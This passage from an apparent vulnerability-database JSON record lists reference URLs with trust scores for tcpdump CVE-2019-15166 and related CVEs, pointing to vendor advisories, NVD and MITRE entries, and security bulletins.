      },
      {
        "trust": 1.8,
        "url": "https://seclists.org/bugtraq/2019/dec/23"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/the-tcpdump-group/tcpdump/commit/0b661e0aa61850234b64394585cf577aac570bf4"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20200120-0001/"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/kb/ht210788"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2019/dsa-4547"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2019/dec/26"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/the-tcpdump-group/tcpdump/blob/tcpdump-4.9/changes"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00050.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00053.html"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4252-1/"
      },
      {
        "trust": 1.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15166"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/62xy42u6hy3h2apr5ehnwcz7saqnmmjn/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/r2udposgvjqiyc33sqbxmdxhh4qdsdmu/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/fnyxf3iy2x65iod422sa6equulsgw7fn/"
      },
      {
        "trust": 0.9,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15166"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62xy42u6hy3h2apr5ehnwcz7saqnmmjn/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/r2udposgvjqiyc33sqbxmdxhh4qdsdmu/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/fnyxf3iy2x65iod422sa6equulsgw7fn/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14466"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14467"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10103"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14469"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14465"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14881"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14463"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16228"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14879"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10105"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14461"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14882"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16227"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14464"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16452"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16230"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14468"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14880"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16300"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14462"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16229"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16451"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14470"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192674-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914191-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k44551633"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.6,
        "url": "https://lists.debian.org/debian-security-announce/2019/msg00199.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4094/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/154710/slackware-security-advisory-tcpdump-updates.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0864"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4632/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3814.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0289/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3814/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4244/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0692"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1169974"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4513/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3885/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3840/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/159874/red-hat-security-advisory-2020-4760-01.html"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-16300"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-10105"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-15166"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-16230"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-16229"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14882"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-16227"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14461"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14464"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14469"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14880"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14468"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14466"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14467"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14462"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14881"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-16451"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-10103"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-16228"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14463"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14879"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14470"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-14465"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-16452"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-20907"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-13050"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9925"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9802"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-20218"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9895"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8625"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-20388"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-15165"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-14382"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8812"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3899"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8819"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3867"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8720"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9893"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-19221"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8808"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3902"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-18197"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-1751"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3900"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9805"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8820"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9807"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8769"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8710"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8813"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9850"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-7595"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8811"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-16168"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9803"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9862"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9327"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3885"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-15503"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-16935"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-20916"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-5018"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-19956"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-10018"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-14422"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8835"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8764"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8844"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3865"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-1730"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3864"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-19906"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-20387"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-14391"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3862"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3901"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8823"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-1752"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-15903"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3895"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-8492"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-11793"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-20454"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2018-20843"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9894"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8816"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9843"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-13627"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-6405"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8771"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3897"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9806"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8814"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-14889"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8743"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-9915"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8815"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-13632"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-10029"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8783"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-20807"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-13630"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-14040"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-11068"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-13631"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8766"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8846"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3868"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-3894"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-8782"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:4760"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16845"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8177"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-15586"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14019"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8624"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25684"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26160"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-1971"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8623"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25683"
      },
      {
        "trust": 0.2,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29652"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24659"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17450"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-15999"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25682"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8622"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25685"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25686"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25687"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25681"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8619"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27813"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18609"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_openshift_container_s"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-1551"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5605"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25660"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1885700]"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7720"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8237"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14881"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14461"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14468"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16230"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14463"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15167"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14464"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16301"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16227"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16808"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14466"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10105"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14879"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16228"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16300"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16229"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14882"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16301"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14880"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16451"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14467"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14470"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14465"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10103"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16452"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14469"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16808"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14462"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/tcpdump"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19770"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25662"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24490"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-2007"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19072"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8649"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12655"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9458"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13225"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13249"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27846"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20636"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18808"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18809"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14553"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20054"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12826"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15862"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25211"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19602"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10773"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25661"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10749"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25641"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6977"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8647"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15917"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0305"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20812"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5633"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15157"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6978"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25658"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0444"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16233"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25694"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14553"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2752"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20386"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19543"
      },
      {
        "trust": 0.1,
